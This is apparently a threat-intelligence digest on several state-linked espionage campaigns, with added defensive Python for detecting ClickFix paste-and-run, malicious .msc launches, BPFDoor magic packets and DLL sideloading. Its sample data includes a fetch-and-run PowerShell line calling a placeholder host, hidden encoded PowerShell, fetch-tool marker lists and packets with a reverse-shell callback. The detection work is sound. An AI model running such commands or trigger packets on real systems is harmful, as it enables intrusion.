info@thehackernews.com (The Hacker News)
//
A China-linked cyber espionage group known as Lotus Panda, also tracked as Billbug, has been targeting organizations in Southeast Asia. The campaign, which ran from August 2024 to February 2025, compromised multiple organizations in a single Southeast Asian country, spanning government, critical infrastructure and media, which points to broad espionage collection rather than a single target of interest. The intrusions used previously unseen tooling, including loaders, credential stealers and a reverse SSH tool.
The intrusions abused legitimate, signed executables from two security vendors, Trend Micro's tmdbglog.exe and Bitdefender's bds.exe, to sideload malicious DLLs: a DLL carrying a name the trusted binary expects is dropped into the same directory, is loaded in place of the genuine library, and then decrypts and executes the next-stage payload. Because the process that runs is a vendor-signed binary, the technique blunts allow-listing and signature-based detection; the loaded DLL, not the process, is what a hunt has to examine.
Beyond sideloading, Lotus Panda deployed custom browser credential stealers, ChromeKatz and CredentialKatz, alongside the reverse SSH tool. The group is also known for the Sagerunex backdoor, seen in its earlier attacks on Asian organizations. Victims in this campaign included a government ministry, an air traffic control organization, a telecommunications provider, a construction company, a news agency and an air freight organization, which illustrates the sustained pressure state-backed actors place on the region.
References :
- www.scworld.com: Southeast Asia subjected to Lotus Panda attack campaign
- The Hacker News: Lotus Panda Hacks SE Asian Governments With Browser Stealers and Sideloaded Malware
- eSecurity Planet: Lotus Panda Hackers Strike Southeast Asian Governments With Browser Stealers, Sideloaded Malware
- www.esecurityplanet.com: Lotus Panda Hackers Strike Southeast Asian Governments With Browser Stealers, Sideloaded Malware
- Industrial Cyber: Billbug espionage group targets government, critical sectors in coordinated Southeast Asia cyber intrusion campaign
- Broadcom Software Blogs: 🚩 Lotus Panda Targets SE Asian Governments Using DLL Sideloading and Browser Stealers
- socprime.com: Billbug Attack Detection: China-Linked Espionage Actors Target Southeast Asian Organizations
- therecord.media: Research on China-linked hacking groups targeting Southeast Asian organizations.
@gbhackers.com
//
State-sponsored groups from North Korea, Iran and Russia are now widely employing ClickFix, a social engineering technique previously associated with cybercriminals. A ClickFix lure, typically a fake error message or a bogus verification step, instructs the user to copy a command, paste it into the Run dialog or a terminal, and execute it; the victim, not an exploit, runs the attacker's code. Proofpoint researchers documented this shift over a three-month period from late 2024 to early 2025, noting that in these chains ClickFix replaces the installation and execution stages and gets past controls that expect a malicious attachment or an exploit.
The adoption of ClickFix has been observed in campaigns tailored to each actor's objectives and targets. The North Korean actor TA427 (Kimsuky) used it in phishing against think tanks working on North Korean affairs: impersonating diplomatic personnel and directing victims to spoofed document-sharing platforms, it got them to run commands that installed the Quasar remote access trojan. The Iranian group TA450 (MuddyWater) targeted organizations in the Middle East with lures posing as Microsoft security updates, with the pasted command installing a remote management tool that then served as the channel for espionage and data exfiltration.
Russian-linked groups, including UNK_RemoteRogue and TA422 (APT28), have also experimented with the technique. Its appeal is that it needs no exploit: the user supplies the execution, the command is usually a short fetch-and-run one-liner, and the payload can be whatever the operator already has. Not every group kept using ClickFix after an initial test, but its adoption by several state actors at once shows how quickly a criminal technique migrates into espionage tradecraft. User-driven execution of this kind will keep appearing, so defenses have to cover the paste-and-run path (command-line logging, the Run dialog history, and alerting on interpreters launched from the desktop with remote-fetch arguments) and not only attachments and exploits.
References :
- gbhackers.com: State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns
- The Hacker News: Multiple state-sponsored hacking groups from Iran, North Korea, and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to deploy malware
- www.scworld.com: Attacks leveraging the ClickFix social engineering technique have been increasingly conducted by state-backed threat operations to facilitate malware infections over the past few months, reports The Hacker News.
- www.bleepingcomputer.com: State-sponsored hackers embrace ClickFix social engineering tactic
- cyberpress.org: State-Sponsored Hackers Widely Deploy ClickFix Attack in Espionage Campaigns
- cybersecuritynews.com: State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns
- Cyber Security News: State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns
- Cyber Security News: State Sponsored Hackers Widely Deploy ClickFix Attack in Espionage Campaigns
- www.techradar.com: State-sponsored actors spotted using ClickFix hacking tool developed by criminals
- BleepingComputer: ClickFix attacks are being increasingly adopted by threat actors of all levels, with researchers now seeing multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia utilizing the tactic to breach networks.
- securityonline.info: State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
- hackread.com: State-Backed Hackers from North Korea, Iran and Russia Use ClickFix in New Espionage Campaigns
- hackread.com: North Korea, Iran, Russia-Backed Hackers Deploy ClickFix in New Attacks
- sra.io: Beware of ClickFix: A Growing Social Engineering Threat
- The DefendOps Diaries: The Rise of ClickFix: A New Social Engineering Threat
- Anonymous: ClickFix attacks are gaining traction among threat actors, with multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia adopting the technique in recent espionage campaigns.
- Know Your Adversary: 112. State-Sponsored Threat Actors Adopted ClickFix Technique
sila.ozeren@picussecurity.com (Sıla Özeren)@Resources-2
//
A Chinese cyber-espionage group, identified as UNC5221, is actively exploiting a zero-day vulnerability, CVE-2025-22457, in Ivanti Connect Secure. UNC5221 is suspected to be a China-nexus cyber-espionage group known for aggressively targeting edge network devices, such as VPNs, firewalls, and routers, with zero-day exploits since at least 2023. This vulnerability allows for unauthenticated remote code execution, giving attackers the ability to gain unauthorized access to organizations’ networks. The group has a history of quickly leveraging new flaws in Ivanti's Pulse Connect Secure/Ivanti Connect Secure (ICS) VPN appliances.
Exploitation of the flaw was first observed in mid-March 2025. Separately, the group's BRICKSTORM backdoor, originally a Linux payload, has been found in a Windows variant on the networks of European organizations in a campaign reported to date back three years; the Windows build adds network tunneling and uses valid credentials to reach internal systems over Remote Desktop Protocol and Server Message Block. Both activities fit a broader pattern of Chinese state-sponsored actors targeting internet-facing infrastructure for espionage against government and enterprise networks.
Ivanti published its advisory for CVE-2025-22457 on April 3, 2025. The flaw affects Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure and ZTA Gateways; it had already been fixed in Connect Secure 22.7R2.6, released in February 2025, with fixes for Policy Secure and ZTA Gateways following later in April, while Pulse Connect Secure 9.x is end of support and must be migrated rather than patched. The vulnerability is a stack-based buffer overflow triggered by a crafted HTTP request carrying an overly long X-Forwarded-For header. CISA has added the CVE to its Known Exploited Vulnerabilities (KEV) catalog. Organizations running these appliances should upgrade to a fixed release, run Ivanti's Integrity Checker Tool, and treat any integrity failure as a compromise warranting a factory reset before rebuilding on fixed firmware; the appliances should also be watched continuously as part of the external attack surface.
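The check a practitioner would put in front of such an appliance while waiting for a maintenance window, as an added example that is not Ivanti's code and makes no claim about how the appliance itself parses the header: a reverse-proxy or WAF rule that refuses any X-Forwarded-For value that is not a short list of literal IP addresses. The limits (256 bytes, 8 hops), the function names and the sample requests are all constructed for this example.

```python
import ipaddress

# Limits are assumptions for this example: a handful of proxy hops is normal,
# hundreds of bytes of X-Forwarded-For is not.
MAX_XFF_LEN = 256
MAX_XFF_HOPS = 8


def validate_xff(header, max_len=MAX_XFF_LEN, max_hops=MAX_XFF_HOPS):
    """Return (ok, reason) for an X-Forwarded-For value.

    Accepts only a short, comma-separated list of literal IPv4/IPv6 addresses.
    Length is checked first because the overflow primitive is an over-long
    header; the per-entry parse then rejects anything that is merely digits
    and dots but not an address, which a length cap alone would let through.
    """
    if header is None:
        return True, "absent"
    if len(header) > max_len:
        return False, f"header too long ({len(header)} > {max_len})"
    entries = [e.strip() for e in header.split(",")]
    if len(entries) > max_hops:
        return False, f"too many hops ({len(entries)} > {max_hops})"
    for entry in entries:
        if not entry:
            return False, "empty entry"
        try:
            ipaddress.ip_address(entry)
        except ValueError:
            return False, f"not an IP literal: {entry[:32]!r}"
    return True, "ok"


def filter_request(headers):
    """Decide whether a request may be forwarded to the appliance.

    headers: dict of header name -> value (case-insensitive lookup).
    A bad X-Forwarded-For is dropped outright rather than stripped, so the
    proxy never launders a malformed request into a clean one.
    """
    xff = next((v for k, v in headers.items()
                if k.lower() == "x-forwarded-for"), None)
    return validate_xff(xff)


# Constructed sample requests for the example.
SAMPLE_REQUESTS = {
    "normal": {"Host": "vpn.example.invalid",
               "X-Forwarded-For": "203.0.113.7, 10.0.0.1"},
    "no_xff": {"Host": "vpn.example.invalid"},
    # digits and dots only, but far longer than any address list
    "overflow_shape": {"Host": "vpn.example.invalid",
                       "X-Forwarded-For": "1." * 400},
    # short enough to pass a length check alone, still not an address
    "short_garbage": {"Host": "vpn.example.invalid",
                      "X-Forwarded-For": "9" * 40},
}


def triage_samples():
    """Run every sample through the filter; returns name -> (forward, reason)."""
    return {name: filter_request(h) for name, h in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, (ok, why) in triage_samples().items():
        print(f"{name:15} forward={ok} ({why})")
```

The two negative samples matter for different reasons: the first is the shape of the reported primitive and fails on length, the second shows why the entry parse is also needed. Log the rejections with the client address; a burst of them against a VPN gateway is itself worth an alert.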
References :
- watchTowr Labs: Watchtowr description
- Resources-2: Who Is the China-Nexus Group UNC5221? UNC5221 is a suspected China-nexus cyber-espionage group known for aggressively targeting edge network devices (VPNs, firewalls, routers) with zero-day exploits since at least 2023 .
- www.scworld.com: Organizations across Europe are having their Windows systems compromised with the BRICKSTORM backdoor linked to Chinese state-backed threat operation UNC5221 as part of a cyberespionage campaign that commenced three years ago, Infosecurity Magazine reports.
- blog.criminalip.io: Response Strategy for Ivanti VPN Vulnerability CVE-2025-22457: CTI-Based Attack Surface Detection
@poliverso.org
//
Chinese-speaking IronHusky hackers are targeting government organizations in Russia and Mongolia with an upgraded version of the MysterySnail remote access trojan (RAT). Kaspersky's Global Research and Analysis Team (GReAT) found the updated implant while investigating attacks that began with a malicious Microsoft Management Console (.msc) file disguised as a Word document; opened through mmc.exe, it downloads the second-stage payloads and establishes persistence on the host, consistent with the group's continued focus on espionage and data theft.
This version of MysterySnail includes an intermediary backdoor that handles file transfers between the command-and-control servers and infected hosts and lets the operators run commands. For C2 the group abuses ppng[.]io, a legitimate public piping server: the implant requests commands from it and posts execution results back to it, so the traffic is ordinary web traffic to a third-party service rather than to attacker-owned infrastructure, which sidesteps IP- and domain-reputation blocking.
MysterySnail, first documented in 2021, had not been publicly reported since, but the re-emerged versions are substantially reworked: Kaspersky describes a variant supporting around 40 commands and a lighter single-component variant it calls MysteryMonoSnail. The continued refinement of the implant, and its use against Russian and Mongolian government bodies, show an APT group that went quiet in public reporting but not in operations.
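Both the ClickFix chains described in the earlier section and the .msc lure above end in the same telemetry: a process-creation event whose parent, image and command line do not fit together. The following is an added example, not code from Proofpoint or Kaspersky, of the two rules a detection engineer would write over such events. The record fields mirror Sysmon Event ID 1 names (ParentImage, Image, CommandLine); the marker list, the rule names and the sample events, including the example.invalid URL and the file names, are constructed for this example.

```python
import ntpath
import re

# Interpreters a ClickFix lure tells the victim to paste a command into.
CLICKFIX_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                   "wscript.exe", "cscript.exe"}
# Parents that mean a human launched it (Win+R, a browser, the desktop),
# as opposed to a scheduled task, installer or management agent.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe",
                       "firefox.exe", "brave.exe"}
# Fetch-and-execute markers; any two together in a pasted one-liner is the signal.
FETCH_EXEC_MARKERS = [
    r"\biex\b", r"invoke-expression", r"\birm\b", r"invoke-restmethod",
    r"invoke-webrequest", r"downloadstring", r"\bcurl\b", r"\bcertutil\b",
    r"https?://", r"-e(nc|ncodedcommand)?\s", r"-w(indowstyle)?\s+hidden",
    r"-nop\b", r"bypass",
]
# Directories a lure-delivered .msc ends up in; a console file run from here
# is not an administrator opening a snap-in.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def _base(path):
    return ntpath.basename(path).lower()


def classify(ev):
    """Return an alert dict for one process-creation event, or None."""
    image, parent = _base(ev["Image"]), _base(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    low = cmd.lower()

    # Rule 1: ClickFix paste-and-run. Interactive parent + shell + remote fetch.
    if image in CLICKFIX_SHELLS and parent in INTERACTIVE_PARENTS:
        hits = [m for m in FETCH_EXEC_MARKERS if re.search(m, low)]
        if len(hits) >= 2:
            return {"rule": "clickfix_paste_and_run", "image": image,
                    "parent": parent, "markers": hits}

    # Rule 2: mmc.exe opening a console file from a user-writable path.
    if image == "mmc.exe":
        for tok in re.findall(r'"[^"]+\.msc"|\S+\.msc', cmd, flags=re.I):
            path = tok.strip('"')
            if any(d in path.lower() for d in USER_WRITABLE):
                return {"rule": "mmc_console_from_user_path", "image": image,
                        "parent": parent, "msc": path,
                        "double_extension": _base(path).count(".") > 1}
    return None


def triage(events):
    """Apply both rules to a list of events; returns the alerts in order."""
    return [a for a in (classify(e) for e in events) if a]


# Constructed sample events (Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/fix.ps1)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Date"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" "C:\Users\bob\Downloads\report.docx.msc"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" C:\Windows\System32\eventvwr.msc'},
    # hidden, encoded, but parented by a service: a different rule's job
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc SQBFAFgA"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Rule 1 deliberately requires an interactive parent, so the last sample (a hidden, encoded PowerShell under svchost.exe) is left to a separate rule rather than diluting the ClickFix one. On the host side the same paste leaves a trace in the user's Run dialog history (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which is worth collecting during triage of a suspected victim.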
References :
- Securelist: MysterySnail RAT attributed to IronHusky APT group hasn’t been reported since 2021. Recently, Kaspersky GReAT detected new versions of this implant in government organizations in Mongolia and Russia.
- The DefendOps Diaries: The MysterySnail RAT: An Evolving Cyber Threat
- BleepingComputer: Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organizations using upgraded MysterySnail remote access trojan (RAT) malware.
- Know Your Adversary: 108. Hunting for Node.js Abuse
- bsky.app: Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organizations using upgraded MysterySnail remote access trojan (RAT) malware.
- www.kaspersky.com: Provides threat intelligence about the IronHusky APT group.
- poliverso.org: IronHusky updates the forgotten MysterySnail RAT to target Russia and Mongolia
- threatmon.io: Threatpost reports on Chinese APT IronHusky Deploys Updated MysterySnail RAT on Russia
- hackread.com: Kaspersky researchers report the reappearance of MysterySnail RAT, a malware linked to Chinese IronHusky APT, targeting Mongolia and…
- securityonline.info: IronHusky APT Resurfaces with Evolved MysterySnail RAT
- Talkback Resources: The MysterySnail RAT, linked to Chinese IronHusky APT, has resurfaced targeting government entities in Mongolia and Russia with a new version capable of executing 40 commands for malicious activities and deploying a modified variant named MysteryMonoSnail.
- securityaffairs.com: Chinese APT IronHusky Deploys Updated MysterySnail RAT on Russia
- securelist.com: Kaspersky report on IronHusky updates the forgotten MysterySnail RAT
- www.scworld.com: Stealthy multi-stage malware attack, updated MysterySnail RAT uncovered
- securityaffairs.com: Malicious payloads have been distributed as part of a new covert multi-stage intrusion while Chinese advanced persistent threat operation IronHusky has been targeting Russian and Mongolian government entities with an upgraded MysterySnail RAT variant, reports The Hacker News.
Anna Ribeiro@Industrial Cyber
//
Trend Micro researchers have uncovered a previously unseen controller for the BPFDoor backdoor, used to open reverse shells on Linux servers across Asia and the Middle East. The controller is attributed to the Red Menshen advanced persistent threat (APT) group, which Trend Micro tracks as Earth Bluecrow. The attacks hit telecommunications, finance and retail organizations in South Korea, Hong Kong, Myanmar, Malaysia and Egypt, and show the group continuing to rely on an implant built to stay invisible to routine checks.
The controller's job is to wake the implant and open a reverse shell (or redirect a port) on the compromised host, from which the operators move laterally, take over further systems and reach sensitive data. BPFDoor attaches a Berkeley Packet Filter (BPF) program to a raw socket, so it sees traffic arriving for other services without opening a listening port; the filter only activates the backdoor when a packet carries a "magic" byte sequence. Because nothing is bound to a port and the process renames itself, a casual sweep (a port scan, netstat, a glance at the process list) finds nothing unusual, which is what makes it suited to long-term espionage.
Trend Micro's telemetry shows BPFDoor active since at least 2021 in consistent campaigns against Linux servers in several industries. The binaries are hidden under non-standard paths such as /tmp/zabbix_agent.log or /bin/vmtoolsdsrv. Defenders are advised to look for TCP packets whose payload begins with the magic bytes 0x5293 followed by an IP:port pair and a password, and for the corresponding UDP and ICMP magic packets. Because operators can change the magic values and passwords, static indicators are unreliable; the durable checks are network-level monitoring for these trigger patterns and host-level inspection of BPF programs attached to sockets (for example, ss -0pb lists packet sockets together with any attached filter).
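A network-side check for the trigger traffic described above, as an added example that is not Trend Micro's code: parse raw IPv4 packets, strip the TCP, UDP or ICMP header, and flag any payload that begins with a configured magic sequence. The TCP value 0x5293 and the "IP:port then password" layout come from the text; the UDP/ICMP value 0x7255 is the one reported in public analyses and is treated here as an assumption, as is the NUL separator between callback and password. The packets are constructed inside the block; on a real sensor the same function would take packets from a pcap or a raw socket.

```python
import socket
import struct

# Magic sequences that wake the backdoor. TCP 0x5293 is from the text;
# UDP/ICMP 0x7255 is the commonly reported value (assumption here). Operators
# customize these, so the detector takes them as a parameter.
DEFAULT_MAGICS = {6: [b"\x52\x93"], 17: [b"\x72\x55"], 1: [b"\x72\x55"]}
PROTO_NAMES = {1: "icmp", 6: "tcp", 17: "udp"}


def parse_ipv4(raw):
    """Return (proto, src, dst, transport_payload) for a raw IPv4 packet, or None."""
    if len(raw) < 20 or raw[0] >> 4 != 4:
        return None
    ihl = (raw[0] & 0x0F) * 4
    proto = raw[9]
    src, dst = socket.inet_ntoa(raw[12:16]), socket.inet_ntoa(raw[16:20])
    seg = raw[ihl:]
    if proto == 6:                      # TCP: header length in the data-offset nibble
        if len(seg) < 20:
            return None
        payload = seg[(seg[12] >> 4) * 4:]
    elif proto in (17, 1):              # UDP and ICMP: fixed 8-byte headers
        payload = seg[8:]
    else:
        return None
    return proto, src, dst, payload


def find_magic_packets(packets, magics=DEFAULT_MAGICS):
    """Flag packets whose transport payload opens with a magic sequence.

    The bytes after the magic (callback IP:port and the password, in the
    layout the text describes) are kept so an analyst can see where the
    reverse shell would connect.
    """
    hits = []
    for raw in packets:
        parsed = parse_ipv4(raw)
        if parsed is None:
            continue
        proto, src, dst, payload = parsed
        for magic in magics.get(proto, []):
            if payload.startswith(magic):
                callback, _, password = payload[len(magic):].partition(b"\x00")
                hits.append({"proto": PROTO_NAMES[proto], "src": src, "dst": dst,
                             "callback": callback.decode(errors="replace"),
                             "password": password.decode(errors="replace")})
                break
    return hits


# --- constructed sample traffic -------------------------------------------
def _ipv4(proto, src, dst, transport):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(transport), 0, 0, 64,
                      proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr + transport


def _tcp(sport, dport, payload):
    # data offset 5 (20-byte header), flags PSH|ACK, checksum left zero
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18,
                       1024, 0, 0) + payload


def _udp(sport, dport, payload):
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload


SAMPLE_PACKETS = [
    _ipv4(6, "198.51.100.9", "10.0.0.5", _tcp(40000, 443,
          b"\x52\x93" + b"198.51.100.9:4444" + b"\x00" + b"examplepw")),
    _ipv4(6, "10.0.0.7", "10.0.0.5", _tcp(51000, 80, b"GET / HTTP/1.1\r\n\r\n")),
    _ipv4(17, "198.51.100.9", "10.0.0.5", _udp(5353, 53,
          b"\x72\x55" + b"198.51.100.9:4444" + b"\x00" + b"examplepw")),
    _ipv4(17, "10.0.0.7", "10.0.0.5", _udp(5353, 53, b"\x00\x01\x00\x00")),
]

if __name__ == "__main__":
    for hit in find_magic_packets(SAMPLE_PACKETS):
        print(hit)
```

The first sample is addressed to port 443 on purpose: the implant is not listening there, but its BPF filter still sees the packet, which is why a port-based allow list on the host does nothing against this trigger. When a sample has been recovered, replace DEFAULT_MAGICS with the values pulled from its filter program rather than relying on the defaults.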
References :
- securityonline.info: BPFDoor Backdoor Used in Asia, Middle East Cyberespionage
- Virus Bulletin: Trend Micro's Fernando Mercês writes about BPFDoor, a state-sponsored backdoor designed for cyberespionage activities targeting the telecommunications, finance and retail sectors across South Korea, Hong Kong, Myanmar, Malaysia and Egypt.
- www.trendmicro.com: BPFDoor’s new hidden controller emerges! Attackers can open reverse shells or direct port for stealth access on Linux servers.
- gbhackers.com: A new wave of cyber espionage attacks has brought BPFDoor malware into the spotlight as a stealthy and dangerous tool for compromising networks.
- Cyber Security News: CybersecurityNews: Stealthy Rootkit-Like Malware Known as BPFDoor Using Reverse Shell to Dig Deeper into Compromised Networks
- gbhackers.com: GBHackers: BPFDoor Malware Uses Reverse Shell to Expand Control Over Compromised Networks
- Industrial Cyber: Trend Micro details BPFDoor controller used in stealthy reverse shell attacks on telecom, finance, and retail
- www.scworld.com: Novel BPFDoor backdoor component facilitates covert attacks
- Security Risk Advisors: 🚩 BPFDoor’s Hidden Controller Enables Stealthy Lateral Movement in Linux Server Attacks
- industrialcyber.co: Trend Micro details BPFDoor controller used in stealthy reverse shell attacks on telecom, finance, and retail
- sra.io: BPFDoor’s Hidden Controller Enables Stealthy Lateral Movement in Linux Server Attacks
- The Hacker News: New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks
info@thehackernews.com (The Hacker News)
//
APT29, a Russian state-sponsored hacking group also known as Cozy Bear or Midnight Blizzard, is actively targeting European diplomatic entities with a sophisticated phishing campaign that began in January 2025. The group is using deceptive emails disguised as invitations to wine-tasting events to entice recipients into downloading a malicious ZIP file. This archive, often named "wine.zip," contains a legitimate PowerPoint executable alongside malicious DLL files designed to compromise the victim's system. These campaigns appear to focus primarily on Ministries of Foreign Affairs, as well as other countries' embassies in Europe, with indications suggesting that diplomats based in the Middle East may also be targets.
The archive holds a legitimate, renamed PowerPoint executable (wine.exe) and two hidden DLLs. Running wine.exe causes it to load one of the DLLs from the same directory in place of the library it expects, a DLL sideloading technique, which activates a previously unknown loader called GRAPELOADER. GRAPELOADER establishes persistence in the Windows Registry, collects basic host information such as the username and computer name, and contacts its command-and-control server to fetch the next payload, so the attackers keep access to the compromised host.
GRAPELOADER's stealth lies in how it handles strings: they are stored obfuscated, decrypted only for the moment they are used, and wiped from memory afterwards, which denies memory scanners a clean view. Persistence is deliberately plain, a Run key entry that launches wine.exe at each logon, the kind of artifact a registry baseline catches. Its job is to deliver later-stage shellcode; Check Point also identified updated WINELOADER samples uploaded to VirusTotal with compilation timestamps matching the campaign's activity, tying this wave to the earlier WINELOADER operation. The phishing emails were sent from domains including bakenhof[.]com and silry[.]com.
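The Lotus Panda intrusions earlier on this page and the GRAPELOADER chain above share one primitive: a signed vendor binary loading an attacker's DLL from its own directory. The hunt below is an added example, not code from Symantec or Check Point, of the rule that separates that pattern from normal loads. The record schema is an assumption modelled on Sysmon Event ID 7 (image load) with the process's own signer added; the binary names tmdbglog.exe, bds.exe and wine.exe come from the text, while the DLL names, paths and signer strings in the samples are placeholders.

```python
import ntpath

# DLLs loaded from these locations are OS-supplied; not sideload candidates.
OS_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
               "c:\\windows\\winsxs\\")
# A signed vendor binary executing from one of these is itself unusual.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def _dir(path):
    return ntpath.dirname(path).lower().rstrip("\\") + "\\"


def classify_image_load(ev):
    """Return a finding for one image-load event, or None.

    Fields (assumed schema): Image, ImageLoaded, ExeSigned, ExeSigner,
    DllSigned, DllSigner.
    """
    exe, dll = ev["Image"], ev["ImageLoaded"]
    exe_dir, dll_dir = _dir(exe), _dir(dll)
    if dll_dir.startswith(OS_DLL_DIRS):
        return None                 # normal OS dependency
    if dll_dir != exe_dir:
        return None                 # sideloading relies on same-directory search order
    if not ev.get("ExeSigned"):
        return None                 # an unsigned host binary is a different problem
    exe_signer = (ev.get("ExeSigner") or "").lower()
    dll_signer = (ev.get("DllSigner") or "").lower() if ev.get("DllSigned") else ""
    if dll_signer and dll_signer == exe_signer:
        return None                 # vendor's own library next to vendor's EXE
    reason = "unsigned DLL" if not dll_signer else f"DLL signer mismatch ({dll_signer})"
    severity = "high" if any(d in exe_dir for d in USER_WRITABLE) else "medium"
    return {"exe": ntpath.basename(exe), "exe_signer": exe_signer,
            "dll": ntpath.basename(dll), "dir": exe_dir,
            "reason": reason, "severity": severity}


def hunt(events):
    """Apply the rule to a batch of image-load events; returns the findings."""
    return [f for f in (classify_image_load(e) for e in events) if f]


# Constructed sample events; DLL names, paths and signer strings are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\Downloads\wine\wine.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\wine\helper.dll",
     "ExeSigned": True, "ExeSigner": "Microsoft Corporation", "DllSigned": False},
    {"Image": r"C:\Users\alice\Downloads\wine\wine.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "ExeSigned": True, "ExeSigner": "Microsoft Corporation",
     "DllSigned": True, "DllSigner": "Microsoft Windows"},
    {"Image": r"C:\ProgramData\svc\tmdbglog.exe",
     "ImageLoaded": r"C:\ProgramData\svc\loader.dll",
     "ExeSigned": True, "ExeSigner": "Trend Micro, Inc.", "DllSigned": False},
    {"Image": r"C:\Program Files\Vendor\bds.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\bds.dll",
     "ExeSigned": True, "ExeSigner": "Bitdefender",
     "DllSigned": True, "DllSigner": "Bitdefender"},
    {"Image": r"C:\Program Files\Vendor\bds.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\bds.dll",
     "ExeSigned": True, "ExeSigner": "Bitdefender",
     "DllSigned": True, "DllSigner": "Contoso Ltd"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The last two samples are the same vendor binary loading the same library name; only the signer differs, which is the detail a name-based allow list misses. Signer comparison is also what keeps the rule quiet on legitimate installs, where the vendor's own DLLs sit next to its executable.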
References :
- Check Point Blog: Details on APT29's updated phishing campaign targeting European diplomatic organizations. Focus on new malware and TTPs
- BleepingComputer: Russian state-sponsored espionage group Midnight Blizzard is behind a new spear-phishing campaign targeting diplomatic entities in Europe, including embassies.
- bsky.app: Midnight Blizzard deploys new GrapeLoader malware in embassy phishing
- blog.checkpoint.com: Unmasking APT29: The Sophisticated Phishing Campaign Targeting European Diplomacy
- cyberpress.org: Detailed report about APT29's GRAPELOADER campaign targeting European diplomats.
- research.checkpoint.com: Russia-Linked APT29 Targets European Diplomats with New GRAPELOADER Malware in Sophisticated Phishing Campaign
- Cyber Security News: APT29 Hackers Deploy GRAPELOADER in Latest Attack on European Diplomats
- The Register - Security: Russians lure European diplomats into malware trap with wine-tasting invite
- iHLS: Russian Phishing Campaign Steals Sensitive Data in European Government Networks
- cybersecuritynews.com: APT29 Hackers Deploy GRAPELOADER in Latest Attack on European Diplomats
- www.scworld.com: New APT29 spear-phishing campaign targets European diplomatic organizations
- www.helpnetsecurity.com: Cozy Bear targets EU diplomats with wine-tasting invites (again)
- Check Point Research: Renewed APT29 Phishing Campaign Against European Diplomats
- Help Net Security: Detailed report on the campaign's tactics, techniques, and procedures, including the use of fake wine-tasting invitations.
- securityonline.info: Sophisticated phishing campaign targeting European governments and diplomats, using a wine-themed approach
- securityonline.info: APT29 Targets European Diplomats with Wine-Themed Phishing
- : The tactics, techniques, and procedures (TTPs) observed in this campaign bear strong similarities to those seen in the previous WINELOADER campaign from March 2024, The report contains indicators of compromise such as file names, file hashes and C2 URLs that can be used by security teams to build detections and threat hunting queries.
- Virus Bulletin: The campaign employs a new loader, called GRAPELOADER, which is downloaded via a link in the phishing email.
- The Hacker News: The Hacker News reports on APT29 targeting European diplomats with wine-themed phishing emails and the GrapeLoader malware.
- hackread.com: Russian Cozy Bear’s Wine Lure Drops WineLoader Malware on EU Diplomats
- ciso2ciso.com: Midnight Blizzard Targets European Diplomats with Wine Tasting Phishing Lure – Source: www.infosecurity-magazine.com
- ciso2ciso.com: APT29 Targets European Diplomats with Wine-Themed Phishing
- thehackernews.com: The Russian state-sponsored threat actor known as APT29 has been linked to an advanced phishing campaign that's targeting diplomatic entities across Europe with a new variant of WINELOADER and a previously unreported malware loader codenamed GRAPELOADER.
- www.techradar.com: European diplomats targeted by Russian phishing campaign promising fancy wine tasting
- Talkback Resources: Talkback.sh discusses APT29 Deploys GRAPELOADER Malware Targeting European Diplomats Through Wine-Tasting Lures [mal]
- Talkback Resources: Russian Cozy Bear’s Wine Lure Drops WineLoader Malware on EU Diplomats [social] [mal]
- securityaffairs.com: Russia-linked group APT29 targeted diplomatic entities across Europe with a new malware loader codenamed GRAPELOADER.
- eSecurity Planet: Russian Hackers Target European Diplomats with ‘Wine-Tasting’ Phishing Scams
- www.esecurityplanet.com: Russian state-linked hacking group is ramping up its cyberattacks against diplomatic targets across Europe, using a new stealthy malware tool known as “GrapeLoader” to deliver malicious payloads through cleverly disguised phishing emails.
